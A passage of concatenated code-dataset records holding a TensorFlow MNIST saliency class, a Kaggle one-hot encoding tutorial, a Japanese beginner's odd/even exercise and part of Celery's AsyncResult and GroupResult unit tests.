self.test_batch_size, num_test)\n\n # Get the images from the test-set between index i and j.\n images = self.data.test.images[i:j, :]\n\n # Get the associated labels.\n labels = self.data.test.labels[i:j, :]\n\n # Create a feed-dict with these images and labels.\n feed_dict = {self.x: images,\n self.y_true: labels}\n\n # Calculate the predicted class using TensorFlow.\n cls_pred[i:j] = self.session.run(y_pred_cls, feed_dict=feed_dict)\n\n # Set the start-index for the next batch to the\n # end-index of the current batch.\n i = j\n\n # Convenience variable for the true class-numbers of the test-set.\n cls_true = self.data.test.cls\n\n # Create a boolean array whether each image is correctly classified.\n correct = (cls_true == cls_pred)\n\n # Calculate the number of correctly classified images.\n # When summing a boolean array, False means 0 and True means 1.\n correct_sum = correct.sum()\n\n # Classification accuracy is the number of correctly classified\n # images divided by the total number of images in the test-set.\n acc = float(correct_sum) / num_test\n\n # Print the accuracy.\n msg = \"Accuracy on Test-Set: {0:.1%} ({1} / {2})\"\n print(msg.format(acc, correct_sum, num_test))\n\n # Plot some examples of mis-classifications, if desired.\n if show_example_errors:\n print(\"Example errors:\")\n plot_example_errors(cls_pred=cls_pred, correct=correct)\n\n # Plot the confusion matrix, if desired.\n if show_confusion_matrix:\n print(\"Confusion Matrix:\")\n plot_confusion_matrix(cls_pred=cls_pred)\n\n def plot_conv_weights(self,weights, input_channel=0):\n # Assume weights are TensorFlow ops for 4-dim variables\n # e.g. weights_conv1 or weights_conv2.\n\n # Retrieve the values of the weight-variables from TensorFlow.\n # A feed-dict is not necessary because nothing is calculated.\n w = self.session.run(weights)\n\n # Get the lowest and highest values for the weights.\n # This is used to correct the colour intensity across\n # the images so they can be compared with each other.\n w_min = np.min(w)\n w_max = np.max(w)\n\n # Number of filters used in the conv. layer.\n num_filters = w.shape[3]\n\n # Number of grids to plot.\n # Rounded-up, square-root of the number of filters.\n num_grids = math.ceil(math.sqrt(num_filters))\n\n # Create figure with a grid of sub-plots.\n fig, axes = plt.subplots(num_grids, num_grids)\n\n # Plot all the filter-weights.\n for i, ax in enumerate(axes.flat):\n # Only plot the valid filter-weights.\n if i<num_filters:\n # Get the weights for the i'th filter of the input channel.\n # See new_conv_layer() for details on the format\n # of this 4-dim tensor.\n img = w[:, :, input_channel, i]\n\n # Plot image.\n ax.imshow(img, vmin=w_min, vmax=w_max,\n interpolation='nearest', cmap='seismic')\n\n # Remove ticks from the plot.\n ax.set_xticks([])\n ax.set_yticks([])\n\n # Ensure the plot is shown correctly with multiple plots\n # in a single Notebook cell.\n plt.show()\n\n def plot_conv_layer(self,layer, image):\n # Assume layer is a TensorFlow op that outputs a 4-dim tensor\n # which is the output of a convolutional layer,\n # e.g. layer_conv1 or layer_conv2.\n\n # Create a feed-dict containing just one image.\n # Note that we don't need to feed y_true because it is\n # not used in this calculation.\n feed_dict = {self.x: [image]}\n\n # Calculate and retrieve the output values of the layer\n # when inputting that image.\n values = self.session.run(layer, feed_dict=feed_dict)\n\n # Number of filters used in the conv. layer.\n num_filters = values.shape[3]\n\n # Number of grids to plot.\n # Rounded-up, square-root of the number of filters.\n num_grids = math.ceil(math.sqrt(num_filters))\n\n # Create figure with a grid of sub-plots.\n fig, axes = plt.subplots(num_grids, num_grids)\n\n # Plot the output images of all the filters.\n for i, ax in enumerate(axes.flat):\n # Only plot the images for valid filters.\n if i<num_filters:\n # Get the output image of using the i'th filter.\n # See new_conv_layer() for details on the format\n # of this 4-dim tensor.\n img = values[0, :, :, i]\n\n # Plot image.\n ax.imshow(img, interpolation='nearest', cmap='binary')\n\n # Remove ticks from the plot.\n ax.set_xticks([])\n ax.set_yticks([])\n\n # Ensure the plot is shown correctly with multiple plots\n # in a single Notebook cell.\n plt.show()\n\n def plot_image(self,image):\n plt.imshow(np.multiply(image.reshape(self.img_shape),self.scale)+self.offset,\n interpolation='nearest',\n cmap='binary')\n\n plt.show()\n\n def average_output(self,layer, image,suppress_out = False):\n \"\"\"\n layer: needs to be a tensorflow object, e.g net.layer[0]\n suppress_out determines if the image produced is displayed or not (bool)\n returns the average of a given layer’s outputs for a given image.\n \"\"\"\n\n # Create a feed-dict containing just one image.\n # Note that we don't need to feed y_true because it is\n # not used in this calculation.\n feed_dict = {self.x: [image]}\n\n # Calculate and retrieve the output values of the layer\n # when inputting that image.\n values = self.session.run(layer, feed_dict=feed_dict)\n\n # Number of filters used in the conv. layer.\n num_filters = values.shape[3]\n\n img = values[0, :, :, 0]\n\n i=1\n if i<num_filters:\n # Get the output image of using the i'th filter.\n # See new_conv_layer() for details on the format\n # of this 4-dim tensor.\n img = img + values[0, :, :, i]\n\n if suppress_out==False:\n img = img/num_filters\n plt.imshow(img) \n plt.show()\n \n return img\n\n\n def give_prob(self,image,layer = None):\n \"\"\"\n gives the network output at a given layer (default is final)\n \"\"\"\n if(layer is None):\n output = self.y_pred\n else:\n output = self.layers[layer]\n\n img_shape=self.img_shape\n if image.ndim == 4:\n pre_class = np.zeros([image.shape[0],10])\n for i in range(0,image.shape[0]):\n im = image[i,:,:,0].reshape(img_shape[0]*img_shape[1])\n feed_dict = {self.x: [im],\n self.y_true: [[-1,-1,-1,-1,-1,-1,-1,-1,-1,-1]]}\n pre_class[i,:] = self.session.run([output], feed_dict=feed_dict)[0]\n return pre_class\n elif image.ndim==3:\n im = image[:,:,0].reshape(img_shape[0]*img_shape[1])\n elif image.ndim==2:\n im = image[:,:].reshape(img_shape[0]*img_shape[1])\n\n elif image.ndim==1:\n im = image\n feed_dict = {self.x: [im],\n self.y_true: [[-1,-1,-1,-1,-1,-1,-1,-1,-1,-1]]}\n #y_true is unknown for this image so the vector can be anything\n # Calculate the predicted class using TensorFlow.\n return self.session.run([output], feed_dict=feed_dict)[0]\n\n def give_class(self,image):\n img_shape=self.img_shape\n if image.ndim == 4:\n pre_class = np.zeros([image.shape[0],10])\n for i in range(0,image.shape[0]):\n im = image[i,:,:,0].reshape(img_shape[0]*img_shape[1])\n feed_dict = {self.x: [im],\n self.y_true: [[-1,-1,-1,-1,-1,-1,-1,-1,-1,-1]]}\n pre_class[i,:] = self.session.run([self.y_pred], feed_dict=feed_dict)[0]\n return pre_class\n elif image.ndim==3:\n im = image[:,:,0].reshape(img_shape[0]*img_shape[1])\n elif image.ndim==2:\n im = image[:,:].reshape(img_shape[0]*img_shape[1])\n\n elif image.ndim==1:\n im = image\n feed_dict = {self.x: [im],\n self.y_true: [[-1,-1,-1,-1,-1,-1,-1,-1,-1,-1]]}\n #y_true is unknown for this image so the vector can be anything\n # Calculate the predicted class using TensorFlow.\n return self.session.run([self.y_pred_cls], feed_dict=feed_dict)[0][0]\n\n def find_plane(self,x,Weights=None,Biases = None,node=None,layer=None):\n \"\"\"\n This function finds the W,B and y for which xW+B = y.\n When specified this is done only for the \"node\" at depth \"layer\" of the network.\n Else it is done for all nodes in the final layer.\n outputs W,B,y\n\n x is the input being analyised as a numpy array (flattened or not)\n weights is a python list containing the weight matrices for each layer [layer0_weights, layer1_weights....]\n biases is a python list containing the bias vectors for each layer[layer0_biases, layer1_biases....]\n node is either None, int or list with 2 elements.\n When None the weight output will have shape (output size) and the pias will have size (output size)\n if node is an int, it is the node in the final layer for which the decision plane is being sought,\n hence the shapes will be: (input size)x1 and 1, respectivly\n if node is a 2 element list the decision plane will be the boundary between element 0 and element 1 in the list\n this can be faster than generating new lists\n layer is either None, an int or a list length 2\n when layer is None the whole network is analysed and the node arguament applies to the final layer\n when layer is an int the network only up to that layer will be analysed and node applies to that layer.\n When layer is a list length 2 it gives the begin and end layer to analyse- in htis case x should be the input to the smaller numbered layer.\n this can be faster than generating new lists\n\n the network structure is: x = Y0:\n Y0 R0 W0 + B0=Y1\n Y1 R1 W1 + B1 = Y2\n ...\n\n Note ther ReLU step is on the input not the output, the node and layer are with reference to Y (hence layer cannot be 0).\n \"\"\"\n\n #check valid layer to investigate\n nlayersmin=0\n if layer is not None:\n if np.isscalar(layer):\n nlayers = layer\n elif len(layer) == 2:\n nlayersmin = min(layer)\n nlayers = max(layer)\n else:\n raise ValueError('layer length/type incorrect')\n\n else:\n if Weights is None:\n if Biases is None:\n nlayers = len(self.layers)\n else:\n nlayers=len(Biases)\n else:\n if Biases is None:\n nlayers=len(Weights)\n else:\n nlayers=min(len(Weights),len(Biases))\n if len(Weights)!=len(Beights):\n raise ValueError('Weight and Bias arrays must be the same length')\n\n if Weights is None:\n weights = []\n for L in range (nlayersmin,nlayers):\n weights.append(self.session.run(self.weights[L]).copy())\n else:\n weights = Weights.copy()\n\n if Biases is None:\n biases = []\n for L in range (nlayersmin,nlayers):\n biases.append(self.session.run(self.biases[L]).copy())\n else:\n biases = Biases.copy()\n\n\n #focus on the specified node.\n if node is not None:\n if np.isscalar(node):\n weights[-1] =np.array(weights[-1][:,node])\n biases[-1] = np.array([biases[-1][node]])\n elif len(node) == 2:\n weights[-1] =np.array(weights[-1][:,node[0]]-weights[-1][:,node[1]])\n biases[-1] = np.array([biases[-1][node[0]]-biases[-1][node[1]]])\n else:\n raise ValueError('node argument of improper type/length')\n\n #begin by creating RelU matrices\n y = np.multiply(x.flatten(),self.scale)+self.offset\n R = [np.identity(x.size)]\n for L in range (0,nlayers-nlayersmin):\n y = y.dot(R[L]).dot(weights[L])+biases[L]\n r = (1.0*(y>=0))\n R.append(np.diag(r))\n\n #combine the weights, bias and ReLU matrices to produce W and B matrices\n W = 1\n Btemp = biases.copy()\n for L in range (0,nlayers-nlayersmin):\n #print(W.shape)\n Btemp[-1-L] = (Btemp[-1-L]).dot(W)\n W= (R[-2-L]).dot(weights[-1-L]).dot(W)\n\n B = sum(Btemp)\n return W,B,y\n","repo_name":"AndrewLouw/Saliency-Comparison","sub_path":"Mnist_net.py","file_name":"Mnist_net.py","file_ext":"py","file_size_in_byte":32566,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"9972588677","text":"# Read the data\nimport pandas as pd\ntrain_data = pd.read_csv('../input/train.csv')\ntest_data = pd.read_csv('../input/test.csv')\n\n# Drop houses where the target is missing\ntrain_data.dropna(axis=0, subset=['SalePrice'], inplace=True)\n\ntarget = train_data.SalePrice\n\n# Since missing values isn't the focus of this tutorial, we use the simplest\n# possible approach, which drops these columns.\n# For more detail (and a better approach) to missing values, see\n# https://www.kaggle.com/dansbecker/handling-missing-values\ncols_with_missing = [col for col in train_data.columns\n if train_data[col].isnull().any()]\ncandidate_train_predictors = train_data.drop(['Id', 'SalePrice'] + cols_with_missing, axis=1)\ncandidate_test_predictors = test_data.drop(['Id'] + cols_with_missing, axis=1)\n\n# \"cardinality\" means the number of unique values in a column.\n# We use it as our only way to select categorical columns here. This is convenient, though\n# a little arbitrary.\nlow_cardinality_cols = [cname for cname in candidate_train_predictors.columns if\n candidate_train_predictors[cname].nunique() < 10 and\n candidate_train_predictors[cname].dtype == \"object\"]\nnumeric_cols = [cname for cname in candidate_train_predictors.columns if\n candidate_train_predictors[cname].dtype in ['int64', 'float64']]\nmy_cols = low_cardinality_cols + numeric_cols\ntrain_predictors = candidate_train_predictors[my_cols]\ntest_predictors = candidate_test_predictors[my_cols]\n\n\n\n#Let's see a random sample of dtypes from our prediction data:\ntrain_predictors.dtypes.sample(10)\n\n\n#Pandas offers a convenient function called **get_dummies** to get one-hot encodings\none_hot_encoded_training_predictors = pd.get_dummies(train_predictors)\n\n\n\n\nfrom sklearn.model_selection import cross_val_score\nfrom sklearn.ensemble import RandomForestRegressor\n\ndef get_mae(X, y):\n # multiple by -1 to make positive MAE score instead of neg value returned as sklearn convention\n return -1 * cross_val_score(RandomForestRegressor(50),\n X, y,\n scoring = 'neg_mean_absolute_error').mean()\n\npredictors_without_categoricals = train_predictors.select_dtypes(exclude=['object'])\n\nmae_without_categoricals = get_mae(predictors_without_categoricals, target)\n\nmae_one_hot_encoded = get_mae(one_hot_encoded_training_predictors, target)\n\nprint('Mean Absolute Error when Dropping Categoricals: ' + str(int(mae_without_categoricals)))\nprint('Mean Abslute Error with One-Hot Encoding: ' + str(int(mae_one_hot_encoded)))\n\none_hot_encoded_training_predictors = pd.get_dummies(train_predictors)\none_hot_encoded_test_predictors = pd.get_dummies(test_predictors)\nfinal_train, final_test = one_hot_encoded_training_predictors.align(one_hot_encoded_test_predictors,\n join='left',\n axis=1)\n","repo_name":"Yasaman1997/Machine_Learning","sub_path":"Kaggle_ML/Projects/predict housing prices/Handling Missing Values/Using Categorical Data with One Hot Encoding.py","file_name":"Using Categorical Data with One Hot Encoding.py","file_ext":"py","file_size_in_byte":3037,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"16"} +{"seq_id":"3192457036","text":"# 演習0【前回の復習】\n# 整数を入力してもらう。\n# その整数が奇数の場合は「奇数です」と1度だけ出力する。\n# その整数が偶数の場合は「偶数です」と入力された数の回数出力する。\n# というプログラムを作成してください。\n# 例1)\n# 整数を入力してください:5\n# 結果:\n# 奇数です\nch = input(\"数字を入力してください\")\nnum = int(ch)\n\n# if num % 2 == 1:\n# print(\"奇数です\")\n# else:\n# print(\"偶数です\")\n\nif num % 2 == 0:\n count = num # 入力された値\n msg = \"偶数です\"\nelse:\n count = 1\n msg = \"奇数です\"\n\nfor i in range(count):\n print(msg)\n\n\n# 例2)\n# 整数を入力してください:4\n# 結果:\n# 偶数です\n# 偶数です\n# 偶数です\n# 偶数です\n# ch = input(\"整数を入力してください\")\n# num = int(ch)\n\n# if num % 2 == 1:\n# print(\"奇数です\" * num)\n# else:\n# print(\"偶数です\\n\" * num)\n\n\n# プログラムの流れも自分で考えてみましょう。\n# 難しい場合は、分かる部分からプログラムを書いてみましょう。\n","repo_name":"Masaru-DaL/School","sub_path":"term.1/PythonProgramming_a/2022.04.28/exercise0.py","file_name":"exercise0.py","file_ext":"py","file_size_in_byte":1128,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"71708571848","text":"from __future__ import absolute_import\n\nfrom contextlib import contextmanager\n\nfrom celery import states\nfrom celery.exceptions import IncompleteStream, TimeoutError\nfrom celery.five import range\nfrom celery.result import (\n AsyncResult,\n EagerResult,\n TaskSetResult,\n result_from_tuple,\n)\nfrom celery.utils import uuid\nfrom celery.utils.serialization import pickle\n\nfrom celery.tests.case import AppCase, Mock, depends_on_current_app, patch\n\n\ndef mock_task(name, state, result):\n return dict(id=uuid(), name=name, state=state, result=result)\n\n\ndef save_result(app, task):\n traceback = 'Some traceback'\n if task['state'] == states.SUCCESS:\n app.backend.mark_as_done(task['id'], task['result'])\n elif task['state'] == states.RETRY:\n app.backend.mark_as_retry(\n task['id'], task['result'], traceback=traceback,\n )\n else:\n app.backend.mark_as_failure(\n task['id'], task['result'], traceback=traceback,\n )\n\n\ndef make_mock_group(app, size=10):\n tasks = [mock_task('ts%d' % i, states.SUCCESS, i) for i in range(size)]\n [save_result(app, task) for task in tasks]\n return [app.AsyncResult(task['id']) for task in tasks]\n\n\nclass test_AsyncResult(AppCase):\n\n def setup(self):\n self.task1 = mock_task('task1', states.SUCCESS, 'the')\n self.task2 = mock_task('task2', states.SUCCESS, 'quick')\n self.task3 = mock_task('task3', states.FAILURE, KeyError('brown'))\n self.task4 = mock_task('task3', states.RETRY, KeyError('red'))\n\n for task in (self.task1, self.task2, self.task3, self.task4):\n save_result(self.app, task)\n\n @self.app.task(shared=False)\n def mytask():\n pass\n self.mytask = mytask\n\n def test_compat_properties(self):\n x = self.app.AsyncResult('1')\n self.assertEqual(x.task_id, x.id)\n x.task_id = '2'\n self.assertEqual(x.id, '2')\n\n def test_children(self):\n x = self.app.AsyncResult('1')\n children = [EagerResult(str(i), i, states.SUCCESS) for i in range(3)]\n x._cache = {'children': children, 'status': states.SUCCESS}\n x.backend = Mock()\n self.assertTrue(x.children)\n self.assertEqual(len(x.children), 3)\n\n def test_propagates_for_parent(self):\n x = self.app.AsyncResult(uuid())\n x.backend = Mock(name='backend')\n x.backend.get_task_meta.return_value = {}\n x.backend.wait_for.return_value = {\n 'status': states.SUCCESS, 'result': 84,\n }\n x.parent = EagerResult(uuid(), KeyError('foo'), states.FAILURE)\n with self.assertRaises(KeyError):\n x.get(propagate=True)\n self.assertFalse(x.backend.wait_for.called)\n\n x.parent = EagerResult(uuid(), 42, states.SUCCESS)\n self.assertEqual(x.get(propagate=True), 84)\n self.assertTrue(x.backend.wait_for.called)\n\n def test_get_children(self):\n tid = uuid()\n x = self.app.AsyncResult(tid)\n child = [self.app.AsyncResult(uuid()).as_tuple()\n for i in range(10)]\n x._cache = {'children': child}\n self.assertTrue(x.children)\n self.assertEqual(len(x.children), 10)\n\n x._cache = {'status': states.SUCCESS}\n x.backend._cache[tid] = {'result': None}\n self.assertIsNone(x.children)\n\n def test_build_graph_get_leaf_collect(self):\n x = self.app.AsyncResult('1')\n x.backend._cache['1'] = {'status': states.SUCCESS, 'result': None}\n c = [EagerResult(str(i), i, states.SUCCESS) for i in range(3)]\n x.iterdeps = Mock()\n x.iterdeps.return_value = (\n (None, x),\n (x, c[0]),\n (c[0], c[1]),\n (c[1], c[2])\n )\n x.backend.READY_STATES = states.READY_STATES\n self.assertTrue(x.graph)\n\n self.assertIs(x.get_leaf(), 2)\n\n it = x.collect()\n self.assertListEqual(list(it), [\n (x, None),\n (c[0], 0),\n (c[1], 1),\n (c[2], 2),\n ])\n\n def test_iterdeps(self):\n x = self.app.AsyncResult('1')\n c = [EagerResult(str(i), i, states.SUCCESS) for i in range(3)]\n x._cache = {'status': states.SUCCESS, 'result': None, 'children': c}\n for child in c:\n child.backend = Mock()\n child.backend.get_children.return_value = []\n it = x.iterdeps()\n self.assertListEqual(list(it), [\n (None, x),\n (x, c[0]),\n (x, c[1]),\n (x, c[2]),\n ])\n x._cache = None\n x.ready = Mock()\n x.ready.return_value = False\n with self.assertRaises(IncompleteStream):\n list(x.iterdeps())\n list(x.iterdeps(intermediate=True))\n\n def test_eq_not_implemented(self):\n self.assertFalse(self.app.AsyncResult('1') == object())\n\n @depends_on_current_app\n def test_reduce(self):\n a1 = self.app.AsyncResult('uuid', task_name=self.mytask.name)\n restored = pickle.loads(pickle.dumps(a1))\n self.assertEqual(restored.id, 'uuid')\n self.assertEqual(restored.task_name, self.mytask.name)\n\n a2 = self.app.AsyncResult('uuid')\n self.assertEqual(pickle.loads(pickle.dumps(a2)).id, 'uuid')\n\n def test_successful(self):\n ok_res = self.app.AsyncResult(self.task1['id'])\n nok_res = self.app.AsyncResult(self.task3['id'])\n nok_res2 = self.app.AsyncResult(self.task4['id'])\n\n self.assertTrue(ok_res.successful())\n self.assertFalse(nok_res.successful())\n self.assertFalse(nok_res2.successful())\n\n pending_res = self.app.AsyncResult(uuid())\n self.assertFalse(pending_res.successful())\n\n def test_str(self):\n ok_res = self.app.AsyncResult(self.task1['id'])\n ok2_res = self.app.AsyncResult(self.task2['id'])\n nok_res = self.app.AsyncResult(self.task3['id'])\n self.assertEqual(str(ok_res), self.task1['id'])\n self.assertEqual(str(ok2_res), self.task2['id'])\n self.assertEqual(str(nok_res), self.task3['id'])\n\n pending_id = uuid()\n pending_res = self.app.AsyncResult(pending_id)\n self.assertEqual(str(pending_res), pending_id)\n\n def test_repr(self):\n ok_res = self.app.AsyncResult(self.task1['id'])\n ok2_res = self.app.AsyncResult(self.task2['id'])\n nok_res = self.app.AsyncResult(self.task3['id'])\n self.assertEqual(repr(ok_res), '<AsyncResult: %s>' % (\n self.task1['id']))\n self.assertEqual(repr(ok2_res), '<AsyncResult: %s>' % (\n self.task2['id']))\n self.assertEqual(repr(nok_res), '<AsyncResult: %s>' % (\n self.task3['id']))\n\n pending_id = uuid()\n pending_res = self.app.AsyncResult(pending_id)\n self.assertEqual(repr(pending_res), '<AsyncResult: %s>' % (\n pending_id))\n\n def test_hash(self):\n self.assertEqual(hash(self.app.AsyncResult('x0w991')),\n hash(self.app.AsyncResult('x0w991')))\n self.assertNotEqual(hash(self.app.AsyncResult('x0w991')),\n hash(self.app.AsyncResult('x1w991')))\n\n def test_get_traceback(self):\n ok_res = self.app.AsyncResult(self.task1['id'])\n nok_res = self.app.AsyncResult(self.task3['id'])\n nok_res2 = self.app.AsyncResult(self.task4['id'])\n self.assertFalse(ok_res.traceback)\n self.assertTrue(nok_res.traceback)\n self.assertTrue(nok_res2.traceback)\n\n pending_res = self.app.AsyncResult(uuid())\n self.assertFalse(pending_res.traceback)\n\n def test_get(self):\n ok_res = self.app.AsyncResult(self.task1['id'])\n ok2_res = self.app.AsyncResult(self.task2['id'])\n nok_res = self.app.AsyncResult(self.task3['id'])\n nok2_res = self.app.AsyncResult(self.task4['id'])\n\n self.assertEqual(ok_res.get(), 'the')\n self.assertEqual(ok2_res.get(), 'quick')\n with self.assertRaises(KeyError):\n nok_res.get()\n self.assertTrue(nok_res.get(propagate=False))\n self.assertIsInstance(nok2_res.result, KeyError)\n self.assertEqual(ok_res.info, 'the')\n\n def test_get_timeout(self):\n res = self.app.AsyncResult(self.task4['id']) # has RETRY state\n with self.assertRaises(TimeoutError):\n res.get(timeout=0.001)\n\n pending_res = self.app.AsyncResult(uuid())\n with patch('celery.result.time') as _time:\n with self.assertRaises(TimeoutError):\n pending_res.get(timeout=0.001, interval=0.001)\n _time.sleep.assert_called_with(0.001)\n\n def test_get_timeout_longer(self):\n res = self.app.AsyncResult(self.task4['id']) # has RETRY state\n with patch('celery.result.time') as _time:\n with self.assertRaises(TimeoutError):\n res.get(timeout=1, interval=1)\n _time.sleep.assert_called_with(1)\n\n def test_ready(self):\n oks = (self.app.AsyncResult(self.task1['id']),\n self.app.AsyncResult(self.task2['id']),\n self.app.AsyncResult(self.task3['id']))\n self.assertTrue(all(result.ready() for result in oks))\n self.assertFalse(self.app.AsyncResult(self.task4['id']).ready())\n\n self.assertFalse(self.app.AsyncResult(uuid()).ready())\n\n\nclass test_ResultSet(AppCase):\n\n def test_resultset_repr(self):\n self.assertTrue(repr(self.app.ResultSet(\n [self.app.AsyncResult(t) for t in ['1', '2', '3']])))\n\n def test_eq_other(self):\n self.assertFalse(self.app.ResultSet([1, 3, 3]) == 1)\n self.assertTrue(self.app.ResultSet([1]) == self.app.ResultSet([1]))\n\n def test_get(self):\n x = self.app.ResultSet([self.app.AsyncResult(t) for t in [1, 2, 3]])\n b = x.results[0].backend = Mock()\n b.supports_native_join = False\n x.join_native = Mock()\n x.join = Mock()\n x.get()\n self.assertTrue(x.join.called)\n b.supports_native_join = True\n x.get()\n self.assertTrue(x.join_native.called)\n\n def test_get_empty(self):\n x = self.app.ResultSet([])\n self.assertIsNone(x.supports_native_join)\n x.join = Mock(name='join')\n x.get()\n self.assertTrue(x.join.called)\n\n def test_add(self):\n x = self.app.ResultSet([1])\n x.add(2)\n self.assertEqual(len(x), 2)\n x.add(2)\n self.assertEqual(len(x), 2)\n\n @contextmanager\n def dummy_copy(self):\n with patch('celery.result.copy') as copy:\n\n def passt(arg):\n return arg\n copy.side_effect = passt\n\n yield\n\n def test_iterate_respects_subpolling_interval(self):\n r1 = self.app.AsyncResult(uuid())\n r2 = self.app.AsyncResult(uuid())\n backend = r1.backend = r2.backend = Mock()\n backend.subpolling_interval = 10\n\n ready = r1.ready = r2.ready = Mock()\n\n def se(*args, **kwargs):\n ready.side_effect = KeyError()\n return False\n ready.return_value = False\n ready.side_effect = se\n\n x = self.app.ResultSet([r1, r2])\n with self.dummy_copy():\n with patch('celery.result.time') as _time:\n with self.assertPendingDeprecation():\n with self.assertRaises(KeyError):\n list(x.iterate())\n _time.sleep.assert_called_with(10)\n\n backend.subpolling_interval = 0\n with patch('celery.result.time') as _time:\n with self.assertPendingDeprecation():\n with self.assertRaises(KeyError):\n ready.return_value = False\n ready.side_effect = se\n list(x.iterate())\n self.assertFalse(_time.sleep.called)\n\n def test_times_out(self):\n r1 = self.app.AsyncResult(uuid)\n r1.ready = Mock()\n r1.ready.return_value = False\n x = self.app.ResultSet([r1])\n with self.dummy_copy():\n with patch('celery.result.time'):\n with self.assertPendingDeprecation():\n with self.assertRaises(TimeoutError):\n list(x.iterate(timeout=1))\n\n def test_add_discard(self):\n x = self.app.ResultSet([])\n x.add(self.app.AsyncResult('1'))\n self.assertIn(self.app.AsyncResult('1'), x.results)\n x.discard(self.app.AsyncResult('1'))\n x.discard(self.app.AsyncResult('1'))\n x.discard('1')\n self.assertNotIn(self.app.AsyncResult('1'), x.results)\n\n x.update([self.app.AsyncResult('2')])\n\n def test_clear(self):\n x = self.app.ResultSet([])\n r = x.results\n x.clear()\n self.assertIs(x.results, r)\n\n\nclass MockAsyncResultFailure(AsyncResult):\n\n @property\n def result(self):\n return KeyError('baz')\n\n @property\n def state(self):\n return states.FAILURE\n\n def get(self, propagate=True, **kwargs):\n if propagate:\n raise self.result\n return self.result\n\n\nclass MockAsyncResultSuccess(AsyncResult):\n forgotten = False\n\n def forget(self):\n self.forgotten = True\n\n @property\n def result(self):\n return 42\n\n @property\n def state(self):\n return states.SUCCESS\n\n def get(self, **kwargs):\n return self.result\n\n\nclass SimpleBackend(object):\n ids = []\n\n def __init__(self, ids=[]):\n self.ids = ids\n\n def get_many(self, *args, **kwargs):\n return ((id, {'result': i, 'status': states.SUCCESS})\n for i, id in enumerate(self.ids))\n\n\nclass test_TaskSetResult(AppCase):\n\n def setup(self):\n self.size = 10\n self.ts = TaskSetResult(uuid(), make_mock_group(self.app, self.size))\n\n def test_total(self):\n self.assertEqual(self.ts.total, self.size)\n\n def test_compat_properties(self):\n self.assertEqual(self.ts.taskset_id, self.ts.id)\n self.ts.taskset_id = 'foo'\n self.assertEqual(self.ts.taskset_id, 'foo')\n\n def test_compat_subtasks_kwarg(self):\n x = TaskSetResult(uuid(), subtasks=[1, 2, 3])\n self.assertEqual(x.results, [1, 2, 3])\n\n def test_itersubtasks(self):\n it = self.ts.itersubtasks()\n\n for i, t in enumerate(it):\n self.assertEqual(t.get(), i)\n\n\nclass test_GroupResult(AppCase):\n\n def setup(self):\n self.size = 10\n self.ts = self.app.GroupResult(\n uuid(), make_mock_group(self.app, self.size),\n )\n\n @depends_on_current_app\n def test_is_pickleable(self):\n ts = self.app.GroupResult(uuid(), [self.app.AsyncResult(uuid())])\n self.assertEqual(pickle.loads(pickle.dumps(ts)), ts)\n ts2 = self.app.GroupResult(uuid(), [self.app.AsyncResult(uuid())])\n self.assertEqual(pickle.loads(pickle.dumps(ts2)), ts2)\n\n def test_len(self):\n self.assertEqual(len(self.ts), self.size)\n\n def test_eq_other(self):\n self.assertFalse(self.ts == 1)\n\n @depends_on_current_app\n def test_reduce(self):\n self.assertTrue(pickle.loads(pickle.dumps(self.ts)))\n\n def test_iterate_raises(self):\n ar = MockAsyncResultFailure(uuid(), app=self.app)\n ts = self.app.GroupResult(uuid(), [ar])\n with self.assertPendingDeprecation():\n it = ts.iterate()\n with self.assertRaises(KeyError):\n next(it)\n\n def test_forget(self):\n subs = [MockAsyncResultSuccess(uuid(), app=self.app),\n MockAsyncResultSuccess(uuid(), app=self.app)]\n ts = self.app.GroupResult(uuid(), subs)\n ts.forget()\n for sub in subs:\n self.assertTrue(sub.forgotten)\n\n def test_getitem(self):\n subs = [MockAsyncResultSuccess(uuid(), app=self.app),\n MockAsyncResultSuccess(uuid(), app=self.app)]\n ts = self.app.GroupResult(uuid(), subs)\n self.assertIs(ts[0], subs[0])\n\n def test_save_restore(self):\n subs = [MockAsyncResultSuccess(uuid(), app=self.app),\n MockAsyncResultSuccess(uuid(), app=self.app)]\n ts = self.app.GroupResult(uuid(), subs)\n ts.save()\n with self.assertRaises(AttributeError):\n ts.save(backend=object())\n self.assertEqual(self.app.GroupResult.restore(ts.id).subtasks,\n ts.subtasks)\n ts.delete()\n self.assertIsNone(self.app.GroupResult.restore(ts.id))\n with self.assertRaises(AttributeError):\n self.app.GroupResult.restore(ts.id, backend=object())\n\n def test_join_native(self):\n backend = SimpleBackend()\n subtasks = [self.app.AsyncResult(uuid(), backend=backend)\n for i in range(10)]\n ts = self.app.GroupResult(uuid(), subtasks)\n ts.app.backend = backend\n backend.ids = [subtask.id for subtask in subtasks]\n res = ts.join_native()\n self.assertEqual(res, list(range(10)))\n\n def test_join_native_raises(self):\n ts = self.app.GroupResult(uuid(), [self.app.AsyncResult(uuid())])\n ts.iter_native = Mock()\n ts.iter_native.return_value = iter([\n (uuid(), {'status': states.FAILURE, 'result': KeyError()})\n ])\n with self.assertRaises(KeyError):\n ts.join_native(propagate=True)\n\n def test_failed_join_report(self):\n res = Mock()\n ts = self.app.GroupResult(uuid(), [res])\n res.state = states.FAILURE\n res.backend.is_cached.return_value = True\n self.assertIs(next(ts._failed_join_report()), res)\n res.backend.is_cached.return_value = False\n with self.assertRaises(StopIteration):\n next(ts._failed_join_report())\n\n def test_repr(self):\n self.assertTrue(repr(\n self.app.GroupResult(uuid(), [self.app.AsyncResult(uuid())])\n ))\n\n def test_children_is_results(self):\n ts = self.app.GroupResult(uuid(), [self.app.AsyncResult(uuid())])\n self.assertIs(ts.children, ts.results)\n\n def test_iter_native(self):\n backend = SimpleBackend()\n subtasks = [self.app.AsyncResult(uuid(), backend=backend)\n for i in range(10)]\n ts = self.app.GroupResult(uuid(), subtasks)\n ts.app.backend = backend\n backend.ids = [subtask.id for subtask in subtasks]\n self.assertEqual(len(list(ts.iter_native())), 10)\n\n def test_iterate_yields(self):\n ar = MockAsyncResultSuccess(uuid(), app=self.app)\n ar2 = MockAsyncResultSuccess(uuid(), app=self.app)\n ts = self.app.GroupResult(uuid(), [ar, ar2])\n with self.assertPendingDeprecation():\n it = ts.iterate()\n self.assertEqual(next(it), 42)\n self.assertEqual(next(it), 42)\n\n def test_iterate_eager(self):\n ar1 = EagerResult(uuid(), 42, states.SUCCESS)\n ar2 = EagerResult(uuid(), 42, states.SUCCESS)\n ts = 